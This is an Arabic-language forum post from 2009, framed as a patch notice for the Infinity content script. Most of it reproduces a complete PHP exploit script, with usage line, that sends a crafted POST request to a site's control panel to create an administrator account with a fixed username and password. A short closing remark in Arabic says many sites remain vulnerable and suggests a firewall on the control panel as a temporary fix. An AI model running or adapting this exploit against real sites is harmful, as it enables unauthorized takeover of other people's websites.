08-16-2009, 01:45 AM
|
#1
|
|
بيانات اضافيه [
+
]
|
|
رقم العضوية : 13918
|
|
تاريخ التسجيل : Jun 2009
|
|
أخر زيارة : 08-07-2010 (07:08 AM)
|
|
المشاركات :
161 [
+
] |
|
التقييم : 50
|
|
|
لوني المفضل : Cadetblue
|
|
[ ترقيع ] ثغرة بمجلة الانفنتي !
http://milw0rm.com/exploits/9159
Infinity <= 2.0.5 Arbitrary Create Admin Exploit
كود PHP:
<?php print_r(' || || | || o_,_7 _|| . _o_7 _|| q_|_|| o_///_, ( : / (_) / ( .
___________________ _/QQQQQQQQQQQQQQQQQQQ\__ [q] Infinity <= 2.0.5 Create Admin __/QQQ/````````````````\QQQ\___ _/QQQQQ/ \QQQQQQ\ [q] _POST <3 /QQQQ/`` ```QQQQ\ /QQQQ/ \QQQQ\ [q] Owned :) |QQQQ/ By Qabandi \QQQQ| |QQQQ| |QQQQ| |QQQQ| From Kuwait, PEACE... |QQQQ| |QQQQ| |QQQQ| |QQQQ\ iqa[a]hotmail.fr /QQQQ| [/] -[WHAT?]- \QQQQ\ __ /QQQQ/ \QQQQ\ /QQ\_QQQQ/ \QQQQ\ \QQQQQQQ/ \QQQQQ\ /QQQQQ/_ ``\QQQQQ\_____________/QQQ/\QQQQ\_ ``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\ ``````````````````` ````` ______________________________________________________________________________ / \ | :: Stupid vulnerability in a good script :( tsk tsk | \______________________________________________________________________________/ \ No More Private / ````````````````` Sec-Code.com
USAGE: php whatever.php localhost /infinity/
');
ini_set("max_execution_time",0);
function QABANDI($victim,$vic_dir){ $host = $victim; $p = "http://".$host.$vic_dir;
$data ="name=qabandi&password=qabandi&conf_password=qabandi&email=[COLOR=red] ( تم حذف البريد لأن عرضه مخالف لشروط المنتدى ) [/COLOR]&nat=man&hoppy=QabandiWasHere&text=QabandiWasHere&country=1"; $packet ="POST ".$p."/cp/profile.php?action=donewauthor HTTP/1.0\r\n"; $packet.="****************************-Type: application/x-www-form-urlencoded\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="****************************-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data;
//print $packet; $o = @fsockopen($host, 80); if(!$o){ echo "\n[x] No response...\n"; die; } fputs($o, $packet); while (!feof($o)) $data .= fread($o, 1024); fclose($o); $_404 = strstr( $data, "HTTP/1.1 404 Not Found" ); if ( !empty($_404) ){ echo "\n[x] 404 Not Found... Make sure of path. \n"; die; } $_401 = strstr( $data, "401 Authorization Required" ); if ( !empty($_401) ){ echo "\n[x] HTTP authentication detected! (mrakib jdar narry, maku faydeh) \n"; die; } echo "Admin created !\n\nUsername: qabandi\npassword: qabandi";
}
$host1 = $argv[1]; $userdir1=$argv[2]; QABANDI($host1,$userdir1);
die;
?>
حياكم الله ..
ثغرة نزلت بتاريخ 2009-07-15 وللاسف فيه مواقع عربية مصابة للحين ..
خطورة الثغرة : عرض password & user الادمن
ترقيع الثغرة المؤقت : وضع جدار ناري على لوحة تحكم السكربت
فـ بالتالي ماراح يشتغل اكسبلويت الثغرة اللي فوق وماراح تعطي اي نتيجة
الله يحفظكمـ انتمـ ومواقع المسلمين ..
مكتشف الثغرة واحد من الاصدقاء
./ مخاوي الكيبورد
|
|
|
|